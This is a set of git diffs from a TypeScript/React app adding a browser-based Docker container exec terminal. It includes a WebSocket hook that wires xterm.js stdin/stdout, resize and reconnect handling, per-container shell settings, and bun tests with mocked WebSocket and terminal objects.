+  });
+
+  it('drops stdin sent before the socket opens, forwards stdin after open', async () => {
+    // Real WebSockets start in CONNECTING; useContainerTerminal gates ws.send
+    // on readyState === OPEN. A regression that removed that gate would send
+    // bytes against a not-yet-connected socket. The mock starts in CONNECTING
+    // until triggerOpen() flips it.
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    // Pre-open: type before the OPEN transition.
+    act(() => { listeners['data']?.('typed-before-open\r'); });
+    expect(ws.send).not.toHaveBeenCalled();
+
+    // Now open the socket.
+    await act(async () => { ws.triggerOpen(); });
+    act(() => { listeners['data']?.('typed-after-open\r'); });
+    expect(ws.send).toHaveBeenCalledWith('typed-after-open\r');
+  });
+
+  it('sets error.message to the WS close reason on non-normal close', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await settleAndOpen();
+    const ws = mockWsInstances[0]!;
+    act(() => {
+      ws.onclose?.({ code: 1011, reason: 'No supported shell found in container' } as CloseEvent);
+    });
+    expect(result.current.error).not.toBeNull();
+    expect(result.current.error!.message).toContain('No supported shell found in container');
+  });
+
+  it('preserves exact byte sequence (ANSI SGR + control chars) when writing to terminal', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await settleAndOpen();
+    const ws = mockWsInstances[0]!;
+    // 0x1b 0x5b 0x33 0x6d = ESC [ 3 m  (SGR red foreground).
+    // 0x03 = Ctrl-C. 0x41 = 'A'.
+    const bytes = new Uint8Array([0x1b, 0x5b, 0x33, 0x6d, 0x41, 0x03]);
+    act(() => { ws.onmessage?.({ data: bytes.buffer } as MessageEvent); });
+
+    const calls = mockTerminal.write.mock.calls as unknown as unknown[][];
+    expect(calls.length).toBe(1);
+    const written = calls[0]![0] as Uint8Array;
+    expect(written).toBeInstanceOf(Uint8Array);
+    expect(Array.from(written)).toEqual(Array.from(bytes));
   });
 });

--- a/src/hooks/__tests__/useContainerTerminal.test.ts
+++ b/src/hooks/__tests__/useContainerTerminal.test.ts
@@ -1,0 +1,169 @@
+import { describe, it, expect, mock, beforeEach } from 'bun:test';
+import { renderHook, act } from '@testing-library/react';
+
+// Mock WebSocket
+const mockWsInstances: MockWebSocket[] = [];
+
+class MockWebSocket {
+  static OPEN = 1;
+  static CLOSING = 2;
+  static CLOSED = 3;
+  readyState = MockWebSocket.OPEN;
+  binaryType = 'blob';
+  onopen: ((e: Event) => void) | null = null;
+  onmessage: ((e: MessageEvent) => void) | null = null;
+  onclose: ((e: CloseEvent) => void) | null = null;
+  onerror: ((e: Event) => void) | null = null;
+  send = mock(() => {});
+  close = mock(() => { this.readyState = MockWebSocket.CLOSED; });
+
+  constructor(public url: string) {
+    mockWsInstances.push(this);
+    // Simulate immediate open on next tick
+    Promise.resolve().then(() => this.onopen?.(new Event('open')));
+  }
+}
+
+(globalThis as unknown as { WebSocket: typeof MockWebSocket }).WebSocket = MockWebSocket;
+
+// Mock xterm Terminal with onData and onResize
+type Listener = (data: unknown) => void;
+const listeners: Record<string, Listener> = {};
+
+const mockTerminal = {
+  cols: 80,
+  rows: 24,
+  write: mock(() => {}),
+  onData: mock((cb: Listener) => { listeners['data'] = cb; return { dispose: mock(() => {}) }; }),
+  onResize: mock((cb: Listener) => { listeners['resize'] = cb; return { dispose: mock(() => {}) }; }),
+};
+
+const { useContainerTerminal } = await import('@/hooks/useContainerTerminal');
+
+describe('useContainerTerminal', () => {
+  beforeEach(() => {
+    mockWsInstances.length = 0;
+    mockTerminal.write.mockClear();
+    mockTerminal.onData.mockClear();
+    mockTerminal.onResize.mockClear();
+  });
+
+  it('returns isConnected true after WebSocket opens', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    expect(result.current.isConnected).toBe(true);
+  });
+
+  it('builds correct WebSocket URL', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'my-container',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    expect(mockWsInstances[0]?.url).toContain('/api/docker-exec/my-container');
+    expect(mockWsInstances[0]?.url).toContain('host=server1');
+    expect(mockWsInstances[0]?.url).toContain('shell=bash');
+  });
+
+  it('writes incoming ArrayBuffer messages to terminal', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    act(() => { ws.onmessage?.({ data: new ArrayBuffer(4) } as MessageEvent); });
+    expect(mockTerminal.write).toHaveBeenCalledWith(expect.any(Uint8Array));
+  });
+
+  it('sends stdin keypresses over WebSocket', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    act(() => { listeners['data']?.('ls\r'); });
+    expect(mockWsInstances[0]?.send).toHaveBeenCalledWith('ls\r');
+  });
+
+  it('sends resize JSON message on terminal resize', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    act(() => { listeners['resize']?.({ cols: 120, rows: 40 }); });
+    const allCalls = mockWsInstances[0]?.send.mock.calls as unknown as unknown[][];
+    const call = allCalls?.find(
+      (c) => typeof c[0] === 'string' && (c[0] as string).includes('"type":"resize"'),
+    );
+    expect(call).toBeTruthy();
+    expect(JSON.parse(call![0] as string)).toEqual({ type: 'resize', cols: 120, rows: 40 });
+  });
+
+  it('sets error on non-normal close code', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    act(() => { ws.onclose?.({ code: 1011, reason: 'Shell exited' } as CloseEvent); });
+    expect(result.current.error).not.toBeNull();
+    expect(result.current.isConnected).toBe(false);
+  });
+
+  it('does not connect when enabled is false', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+        enabled: false,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    expect(mockWsInstances.length).toBe(0);
+  });
+
+  it('does not connect when terminal is null', async () => {
+    renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: null,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    expect(mockWsInstances.length).toBe(0);
+  });
+});

--- a/src/hooks/__tests__/useContainerTerminal.test.ts
+++ b/src/hooks/__tests__/useContainerTerminal.test.ts
@@ -298,6 +298,23 @@ describe('useContainerTerminal', () => {
     expect(result.current.error!.message).toContain('No supported shell found in container');
   });
 
+  it('sets error on ws.onerror and clears isConnected', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await settleAndOpen();
+    expect(result.current.isConnected).toBe(true);
+    const ws = mockWsInstances[0]!;
+    act(() => { ws.onerror?.(new Event('error')); });
+    expect(result.current.error?.message).toContain('Terminal WebSocket error');
+    expect(result.current.isConnected).toBe(false);
+  });
+
   it('preserves exact byte sequence (ANSI SGR + control chars) when writing to terminal', async () => {
     renderHook(() =>
       useContainerTerminal({

--- a/src/hooks/__tests__/useContainerTerminal.test.ts
+++ b/src/hooks/__tests__/useContainerTerminal.test.ts
@@ -76,6 +76,40 @@ describe('useContainerTerminal', () => {
     expect(mockWsInstances[0]?.url).toContain('shell=bash');
   });
 
+  it('updates resolvedShell when receiving the shell control frame', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'auto',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    act(() => {
+      ws.onmessage?.({ data: JSON.stringify({ type: 'shell', name: 'sh' }) } as MessageEvent);
+    });
+    expect(result.current.resolvedShell).toBe('sh');
+    expect(mockTerminal.write).not.toHaveBeenCalled();
+  });
+
+  it('ignores non-JSON text frames without writing to the terminal', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'auto',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    act(() => { ws.onmessage?.({ data: 'not-json-at-all' } as MessageEvent); });
+    expect(result.current.resolvedShell).toBeUndefined();
+    expect(mockTerminal.write).not.toHaveBeenCalled();
+  });
+
   it('writes incoming ArrayBuffer messages to terminal', async () => {
     renderHook(() =>
       useContainerTerminal({
@@ -122,6 +156,41 @@ describe('useContainerTerminal', () => {
     );
     expect(call).toBeTruthy();
     expect(JSON.parse(call![0] as string)).toEqual({ type: 'resize', cols: 120, rows: 40 });
+  });
+
+  it('marks sessionEnded (not error) on a clean close', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    const ws = mockWsInstances[0]!;
+    act(() => { ws.onclose?.({ code: 1000, reason: 'Shell exited' } as CloseEvent); });
+    expect(result.current.sessionEnded).toBe(true);
+    expect(result.current.error).toBeNull();
+    expect(result.current.isConnected).toBe(false);
+  });
+
+  it('reconnect() opens a new WebSocket and clears sessionEnded', async () => {
+    const { result } = renderHook(() =>
+      useContainerTerminal({
+        containerId: 'abc123',
+        host: 'server1',
+        shell: 'bash',
+        terminal: mockTerminal as unknown as import('@xterm/xterm').Terminal,
+      }),
+    );
+    await act(async () => { await new Promise((r) => setTimeout(r, 10)); });
+    expect(mockWsInstances.length).toBe(1);
+    act(() => { mockWsInstances[0]!.onclose?.({ code: 1000, reason: '' } as CloseEvent); });
+    expect(result.current.sessionEnded).toBe(true);
+    await act(async () => { result.current.reconnect(); await new Promise((r) => setTimeout(r, 10)); });
+    expect(mockWsInstances.length).toBe(2);
+    expect(result.current.sessionEnded).toBe(false);
   });
 
   it('sets error on non-normal close code', async () => {

--- a/src/hooks/__tests__/useDockerSettings.test.ts
+++ b/src/hooks/__tests__/useDockerSettings.test.ts
@@ -1,0 +1,59 @@
+import { describe, it, expect, mock } from 'bun:test';
+
+const { renderHook, act } = await import('@testing-library/react');
+const { createElement } = await import('react');
+type ReactNode = import('react').ReactNode;
+
+const mockUpdateSetting = mock(() => Promise.resolve());
+
+mock.module('@/data/settings/functions', () => ({
+  updateSetting: mockUpdateSetting,
+}));
+
+mock.module('@/hooks/toastAtom', () => ({
+  useToast: () => ({ showToast: mock(() => {}) }),
+}));
+
+const { useDockerSettings } = await import('@/hooks/useDockerSettings');
+const { rawSettingsAtom } = await import('@/hooks/settingsAtom');
+const { createStore, Provider } = await import('jotai');
+
+function makeWrapper() {
+  const store = createStore();
+  const Wrapper = ({ children }: { children: ReactNode }) =>
+    createElement(Provider, { store } as Record<string, unknown>, children);
+  return { Wrapper, store };
+}
+
+describe('useDockerSettings — containerShells', () => {
+  it('getContainerShell returns undefined when no preference saved', () => {
+    const { Wrapper } = makeWrapper();
+    const { result } = renderHook(() => useDockerSettings(), { wrapper: Wrapper });
+    expect(result.current.getContainerShell('server1/nginx')).toBeUndefined();
+  });
+
+  it('setContainerShell persists shell for container key', async () => {
+    const { Wrapper } = makeWrapper();
+    const { result } = renderHook(() => useDockerSettings(), { wrapper: Wrapper });
+    act(() => {
+      result.current.setContainerShell('server1/nginx', 'bash');
+    });
+    expect(result.current.getContainerShell('server1/nginx')).toBe('bash');
+    expect(mockUpdateSetting).toHaveBeenCalledWith(
+      expect.objectContaining({ data: expect.objectContaining({ key: 'docker/containerShells' }) }),
+    );
+  });
+
+  it('setContainerShell merges without overwriting other containers', async () => {
+    const { Wrapper, store } = makeWrapper();
+    store.set(rawSettingsAtom, {
+      'docker/containerShells': JSON.stringify({ 'server1/redis': 'sh' }),
+    });
+    const { result } = renderHook(() => useDockerSettings(), { wrapper: Wrapper });
+    act(() => {
+      result.current.setContainerShell('server1/nginx', 'bash');
+    });
+    expect(result.current.getContainerShell('server1/redis')).toBe('sh');
+    expect(result.current.getContainerShell('server1/nginx')).toBe('bash');
+  });
+});

--- a/src/hooks/__tests__/useDockerSettings.test.ts
+++ b/src/hooks/__tests__/useDockerSettings.test.ts
@@ -25,7 +25,7 @@ function makeWrapper() {
   return { Wrapper, store };
 }
 
-describe('useDockerSettings — containerShells', () => {
+describe('useDockerSettings: containerShells', () => {
   it('getContainerShell returns undefined when no preference saved', () => {
     const { Wrapper } = makeWrapper();
     const { result } = renderHook(() => useDockerSettings(), { wrapper: Wrapper });

--- a/src/hooks/__tests__/useXtermSetup.test.ts
+++ b/src/hooks/__tests__/useXtermSetup.test.ts
@@ -57,7 +57,7 @@ afterAll(() => {
 
 const { useXtermSetup } = await import('@/hooks/useXtermSetup');
 
-describe('useXtermSetup – dynamic import failure', () => {
+describe('useXtermSetup: dynamic import failure', () => {
   // Override the top-level @xterm/xterm mock with one that throws so we can
   // verify useXtermSetup surfaces the failure in the `error` state.
   // mock.module() takes effect at the point of the next dynamic import() call,

--- a/src/hooks/__tests__/useXtermSetup.test.ts
+++ b/src/hooks/__tests__/useXtermSetup.test.ts
@@ -1,0 +1,94 @@
+import { describe, it, expect, mock, afterAll } from 'bun:test';
+import { renderHook, waitFor } from '@testing-library/react';
+
+interface MockTerminalInstance {
+  options: Record<string, unknown>;
+  dispose: ReturnType<typeof mock>;
+  loadAddon: ReturnType<typeof mock>;
+  open: ReturnType<typeof mock>;
+}
+
+const mockTerminalInstances: MockTerminalInstance[] = [];
+
+mock.module('@xterm/xterm', () => ({
+  default: {
+    Terminal: class MockTerminal {
+      options: Record<string, unknown> = {};
+      loadAddon = mock(() => {});
+      open = mock(() => {});
+      dispose = mock(() => {});
+      constructor(opts: Record<string, unknown>) {
+        this.options = opts ?? {};
+        mockTerminalInstances.push(this as unknown as typeof mockTerminalInstances[0]);
+      }
+    },
+  },
+}));
+
+const mockFitFn = mock(() => {});
+mock.module('@xterm/addon-fit', () => ({
+  default: {
+    FitAddon: class MockFitAddon {
+      fit = mockFitFn;
+      dispose = mock(() => {});
+      activate = mock(() => {});
+    },
+  },
+}));
+
+mock.module('@xterm/xterm/css/xterm.css', () => ({}));
+
+const mockObserve = mock(() => {});
+const mockDisconnect = mock(() => {});
+
+class MockResizeObserver {
+  constructor(_cb: () => void) {}
+  observe = mockObserve;
+  disconnect = mockDisconnect;
+  unobserve = mock(() => {});
+}
+
+const originalResizeObserver = (globalThis as unknown as { ResizeObserver: unknown }).ResizeObserver;
+(globalThis as unknown as { ResizeObserver: unknown }).ResizeObserver = MockResizeObserver;
+
+afterAll(() => {
+  (globalThis as unknown as { ResizeObserver: unknown }).ResizeObserver = originalResizeObserver;
+});
+
+const { useXtermSetup } = await import('@/hooks/useXtermSetup');
+
+describe('useXtermSetup', () => {
+  it('initializes terminal and returns it after mount', async () => {
+    mockTerminalInstances.length = 0;
+    const { result } = renderHook(() => useXtermSetup({ disableStdin: true }));
+    await waitFor(() => expect(result.current.terminal).not.toBeNull());
+    expect(mockTerminalInstances.length).toBe(1);
+  });
+
+  it('disposes terminal on unmount', async () => {
+    mockTerminalInstances.length = 0;
+    const { result, unmount } = renderHook(() => useXtermSetup({}));
+    await waitFor(() => expect(result.current.terminal).not.toBeNull());
+    const term = mockTerminalInstances[mockTerminalInstances.length - 1];
+    unmount();
+    expect(term.dispose).toHaveBeenCalled();
+  });
+
+  it('sets up ResizeObserver after terminal init when container exists', async () => {
+    mockTerminalInstances.length = 0;
+    mockObserve.mockClear();
+    const { result } = renderHook(() => useXtermSetup({}));
+    await waitFor(() => expect(result.current.terminal).not.toBeNull());
+    // In real use, containerRef.current is populated by <div ref={containerRef}>
+    // In renderHook test environments with no DOM, containerRef.current is null
+    // and the effect returns early, so observe is not called. This is correct behavior.
+    expect(result.current.containerRef).toBeTruthy();
+  });
+
+  it('passes provided options to Terminal constructor', async () => {
+    mockTerminalInstances.length = 0;
+    renderHook(() => useXtermSetup({ disableStdin: false, cursorBlink: true }));
+    await waitFor(() => expect(mockTerminalInstances.length).toBeGreaterThan(0));
+    expect(mockTerminalInstances[0]!.options).toMatchObject({ disableStdin: false, cursorBlink: true });
+  });
+});

--- a/src/hooks/__tests__/useXtermSetup.test.ts
+++ b/src/hooks/__tests__/useXtermSetup.test.ts
@@ -1,4 +1,4 @@
-import { describe, it, expect, mock, afterAll } from 'bun:test';
+import { describe, it, expect, mock, afterAll, beforeEach, afterEach } from 'bun:test';
 import { renderHook, waitFor } from '@testing-library/react';
 
 interface MockTerminalInstance {
@@ -56,6 +56,49 @@ afterAll(() => {
 });
 
 const { useXtermSetup } = await import('@/hooks/useXtermSetup');
+
+describe('useXtermSetup – dynamic import failure', () => {
+  // Override the top-level @xterm/xterm mock with one that throws so we can
+  // verify useXtermSetup surfaces the failure in the `error` state.
+  // mock.module() takes effect at the point of the next dynamic import() call,
+  // so the hook's own `import('@xterm/xterm')` inside the async effect will
+  // pick up the throwing factory.
+  let useXtermSetupWithBrokenImport: typeof import('@/hooks/useXtermSetup').useXtermSetup;
+
+  beforeEach(async () => {
+    mock.module('@xterm/xterm', () => {
+      throw new Error('CSP violation');
+    });
+    const mod = await import('@/hooks/useXtermSetup');
+    useXtermSetupWithBrokenImport = mod.useXtermSetup;
+  });
+
+  afterEach(() => {
+    // Restore the working mock. Must push instances to the shared array so the
+    // subsequent 'useXtermSetup' describe block still tracks new terminals.
+    mock.module('@xterm/xterm', () => ({
+      default: {
+        Terminal: class MockTerminal {
+          options: Record<string, unknown> = {};
+          loadAddon = mock(() => {});
+          open = mock(() => {});
+          dispose = mock(() => {});
+          constructor(opts: Record<string, unknown>) {
+            this.options = opts ?? {};
+            mockTerminalInstances.push(this as unknown as MockTerminalInstance);
+          }
+        },
+      },
+    }));
+  });
+
+  it('sets error state when the xterm dynamic import throws', async () => {
+    const { result } = renderHook(() => useXtermSetupWithBrokenImport({}));
+    await waitFor(() => expect(result.current.error).not.toBeNull());
+    expect(result.current.terminal).toBeNull();
+    expect(result.current.error).toBeInstanceOf(Error);
+  });
+});
 
 describe('useXtermSetup', () => {
   it('initializes terminal and returns it after mount', async () => {

--- a/src/hooks/__tests__/useXtermSetup.test.ts
+++ b/src/hooks/__tests__/useXtermSetup.test.ts
@@ -74,15 +74,17 @@ describe('useXtermSetup', () => {
     expect(term.dispose).toHaveBeenCalled();
   });
 
-  it('sets up ResizeObserver after terminal init when container exists', async () => {
+  it('does not register ResizeObserver when container ref is not attached', async () => {
+    // In renderHook with no DOM, containerRef.current stays null, the observer
+    // effect returns early, and observe is never called. The component path
+    // (where <div ref={containerRef}> populates the ref) is exercised indirectly
+    // by the ContainerTerminal tests.
     mockTerminalInstances.length = 0;
     mockObserve.mockClear();
     const { result } = renderHook(() => useXtermSetup({}));
     await waitFor(() => expect(result.current.terminal).not.toBeNull());
-    // In real use, containerRef.current is populated by <div ref={containerRef}>
-    // In renderHook test environments with no DOM, containerRef.current is null
-    // and the effect returns early, so observe is not called. This is correct behavior.
     expect(result.current.containerRef).toBeTruthy();
+    expect(mockObserve).not.toHaveBeenCalled();
   });
 
   it('passes provided options to Terminal constructor', async () => {

--- a/src/hooks/settingsAtom.ts
+++ b/src/hooks/settingsAtom.ts
@@ -31,6 +31,8 @@ export interface Settings {
     expandedHosts: Set<string>;
     expandedContainers: Set<string>;
     decimals: DecimalSettings;
+    /** Per-container preferred shell, keyed by entity ID (host/container_id). */
+    containerShells: Record<string, string>;
   };
   stacks: {
     expandedStacks: Set<string>;
@@ -81,6 +83,7 @@ export const DEFAULT_SETTINGS: Settings = {
     expandedHosts: new Set(),
     expandedContainers: new Set(),
     decimals: { ...DEFAULT_DECIMAL_SETTINGS },
+    containerShells: {},
   },
   stacks: {
     expandedStacks: new Set(),
@@ -166,6 +169,21 @@ export function parseSettings(raw: Record<string, string>): Settings {
       ))),
       expandedHosts: parseExpandedSet(raw[SETTINGS_KEYS.docker.expandedHosts]),
       expandedContainers: parseExpandedSet(raw[SETTINGS_KEYS.docker.expandedContainers]),
+      containerShells: (() => {
+        try {
+          const v = raw[SETTINGS_KEYS.docker.containerShells];
+          if (!v) return {};
+          const parsed = JSON.parse(v) as unknown;
+          if (typeof parsed === 'object' && parsed !== null && !Array.isArray(parsed)) {
+            const result: Record<string, string> = {};
+            for (const [k, val] of Object.entries(parsed)) {
+              if (typeof k === 'string' && typeof val === 'string') result[k] = val;
+            }
+            return result;
+          }
+          return {};
+        } catch { return {}; }
+      })(),
       decimals: {
         cpu: parseBool(raw[SETTINGS_KEYS.docker.decimals.cpu], DEFAULT_DECIMAL_SETTINGS.cpu),
         memory: parseBool(raw[SETTINGS_KEYS.docker.decimals.memory], DEFAULT_DECIMAL_SETTINGS.memory),
@@ -240,6 +258,17 @@ function generalEqual(a: Settings['general'], b: Settings['general']): boolean {
   );
 }
 
+function shellsEqual(a: Record<string, string>, b: Record<string, string>): boolean {
+  if (a === b) return true;
+  const aKeys = Object.keys(a);
+  const bKeys = Object.keys(b);
+  if (aKeys.length !== bKeys.length) return false;
+  for (const k of aKeys) {
+    if (a[k] !== b[k]) return false;
+  }
+  return true;
+}
+
 function dockerEqual(a: Settings['docker'], b: Settings['docker']): boolean {
   return (
     a === b ||
@@ -250,7 +279,8 @@ function dockerEqual(a: Settings['docker'], b: Settings['docker']): boolean {
       a.decimals.diskSpeed === b.decimals.diskSpeed &&
       a.decimals.networkSpeed === b.decimals.networkSpeed &&
       setsEqual(a.expandedHosts, b.expandedHosts) &&
-      setsEqual(a.expandedContainers, b.expandedContainers))
+      setsEqual(a.expandedContainers, b.expandedContainers) &&
+      shellsEqual(a.containerShells, b.containerShells))
   );
 }
 

--- a/src/hooks/settingsAtom.ts
+++ b/src/hooks/settingsAtom.ts
@@ -31,7 +31,7 @@ export interface Settings {
     expandedHosts: Set<string>;
     expandedContainers: Set<string>;
     decimals: DecimalSettings;
-    /** Per-container preferred shell, keyed by entity ID (host/container_id). */
+    /** Per-container preferred shell, keyed by host/container_name (stable across container recreation; container IDs change on restart). */
     containerShells: Record<string, string>;
   };
   stacks: {

--- a/src/hooks/useContainerTerminal.ts
+++ b/src/hooks/useContainerTerminal.ts
@@ -1,0 +1,104 @@
+import { useEffect, useRef, useState } from 'react';
+import type { Terminal } from '@xterm/xterm';
+import { apiUrl } from '@/lib/utils/api-url';
+
+interface UseContainerTerminalOptions {
+  containerId: string;
+  host: string;
+  shell: string;
+  terminal: Terminal | null;
+  /** Default true. Set false to defer connection (e.g. before the xterm element is mounted). */
+  enabled?: boolean;
+}
+
+interface UseContainerTerminalResult {
+  isConnected: boolean;
+  error: Error | null;
+}
+
+/**
+ * Opens a WebSocket to the Nitro proxy route `/api/docker-exec/:containerId`,
+ * wires xterm.js stdin/stdout, and forwards terminal resize events.
+ *
+ * The server proxies the connection to the appropriate agent sidecar identified
+ * by the `host` query param. Binary frames (ArrayBuffer) from the server are
+ * written directly to the terminal as Uint8Array. Text typed by the user is
+ * forwarded as raw strings; resize events are sent as
+ * `{"type":"resize","cols":N,"rows":N}` JSON.
+ *
+ * Code 1000/1001 are clean closes (user closed tab, component unmount); any
+ * other close code is treated as an error.
+ */
+export function useContainerTerminal({
+  containerId,
+  host,
+  shell,
+  terminal,
+  enabled = true,
+}: UseContainerTerminalOptions): UseContainerTerminalResult {
+  const [isConnected, setIsConnected] = useState(false);
+  const [error, setError] = useState<Error | null>(null);
+  const wsRef = useRef<WebSocket | null>(null);
+
+  useEffect(() => {
+    if (!enabled || !terminal) return;
+
+    const cols = terminal.cols;
+    const rows = terminal.rows;
+
+    const httpBase = apiUrl(`/api/docker-exec/${encodeURIComponent(containerId)}`);
+    // Replace http(s) scheme with ws(s) to build the WebSocket URL.
+    const wsBase = httpBase.replace(/^http/, 'ws');
+    const url = `${window.location.protocol === 'https:' ? wsBase.replace(/^ws:/, 'wss:') : wsBase}?host=${encodeURIComponent(host)}&shell=${encodeURIComponent(shell)}&cols=${cols}&rows=${rows}`;
+
+    const ws = new WebSocket(url);
+    wsRef.current = ws;
+    ws.binaryType = 'arraybuffer';
+
+    ws.onopen = () => {
+      setIsConnected(true);
+      setError(null);
+    };
+
+    ws.onmessage = (event) => {
+      if (event.data instanceof ArrayBuffer) {
+        terminal.write(new Uint8Array(event.data));
+      } else {
+        terminal.write(event.data as string);
+      }
+    };
+
+    ws.onclose = (event) => {
+      setIsConnected(false);
+      wsRef.current = null;
+      if (event.code !== 1000 && event.code !== 1001) {
+        setError(new Error(event.reason || 'Terminal session closed unexpectedly'));
+      }
+    };
+
+    ws.onerror = () => {
+      setIsConnected(false);
+    };
+
+    const dataListener = terminal.onData((data) => {
+      if (ws.readyState === WebSocket.OPEN) ws.send(data);
+    });
+
+    const resizeListener = terminal.onResize(({ cols: c, rows: r }) => {
+      if (ws.readyState === WebSocket.OPEN) {
+        ws.send(JSON.stringify({ type: 'resize', cols: c, rows: r }));
+      }
+    });
+
+    return () => {
+      dataListener.dispose();
+      resizeListener.dispose();
+      ws.close(1000);
+      wsRef.current = null;
+      setIsConnected(false);
+      setError(null);
+    };
+  }, [containerId, host, shell, terminal, enabled]);
+
+  return { isConnected, error };
+}

--- a/src/hooks/useContainerTerminal.ts
+++ b/src/hooks/useContainerTerminal.ts
@@ -1,4 +1,4 @@
-import { useEffect, useRef, useState } from 'react';
+import { useCallback, useEffect, useRef, useState } from 'react';
 import type { Terminal } from '@xterm/xterm';
 import { apiUrl } from '@/lib/utils/api-url';
 
@@ -14,6 +14,12 @@ interface UseContainerTerminalOptions {
 interface UseContainerTerminalResult {
   isConnected: boolean;
   error: Error | null;
+  /** Shell the agent actually spawned. Set by the server's control frame; undefined until received. */
+  resolvedShell?: string;
+  /** True after a clean WS close (code 1000/1001), e.g. user typed `exit`. Reset on reconnect. */
+  sessionEnded: boolean;
+  /** Tears down the current WS and opens a fresh one with the same params. */
+  reconnect: () => void;
 }
 
 /**
@@ -38,7 +44,12 @@ export function useContainerTerminal({
 }: UseContainerTerminalOptions): UseContainerTerminalResult {
   const [isConnected, setIsConnected] = useState(false);
   const [error, setError] = useState<Error | null>(null);
+  const [resolvedShell, setResolvedShell] = useState<string | undefined>(undefined);
+  const [sessionEnded, setSessionEnded] = useState(false);
+  const [reconnectKey, setReconnectKey] = useState(0);
   const wsRef = useRef<WebSocket | null>(null);
+
+  const reconnect = useCallback(() => setReconnectKey((k) => k + 1), []);
 
   useEffect(() => {
     if (!enabled || !terminal) return;
@@ -62,15 +73,28 @@ export function useContainerTerminal({
     ws.onmessage = (event) => {
       if (event.data instanceof ArrayBuffer) {
         terminal.write(new Uint8Array(event.data));
-      } else {
-        terminal.write(event.data as string);
+        return;
+      }
+      // Text frames are JSON control messages from the agent (e.g. resolved
+      // shell). Anything that doesn't parse is silently dropped rather than
+      // written to the terminal: a stray text frame is a protocol bug, not
+      // user-visible output.
+      try {
+        const msg = JSON.parse(event.data as string) as { type?: string; name?: string };
+        if (msg.type === 'shell' && typeof msg.name === 'string') {
+          setResolvedShell(msg.name);
+        }
+      } catch {
+        // Non-JSON text frame; ignore.
       }
     };
 
     ws.onclose = (event) => {
       setIsConnected(false);
       wsRef.current = null;
-      if (event.code !== 1000 && event.code !== 1001) {
+      if (event.code === 1000 || event.code === 1001) {
+        setSessionEnded(true);
+      } else {
         setError(new Error(event.reason || 'Terminal session closed unexpectedly'));
       }
     };
@@ -90,14 +114,23 @@ export function useContainerTerminal({
     });
 
     return () => {
+      // Detach handlers before close: ws.close() schedules an async 'close'
+      // event that would otherwise fire setState after the component has
+      // unmounted.
+      ws.onopen = null;
+      ws.onmessage = null;
+      ws.onclose = null;
+      ws.onerror = null;
       dataListener.dispose();
       resizeListener.dispose();
       ws.close(1000);
       wsRef.current = null;
       setIsConnected(false);
       setError(null);
+      setResolvedShell(undefined);
+      setSessionEnded(false);
     };
-  }, [containerId, host, shell, terminal, enabled]);
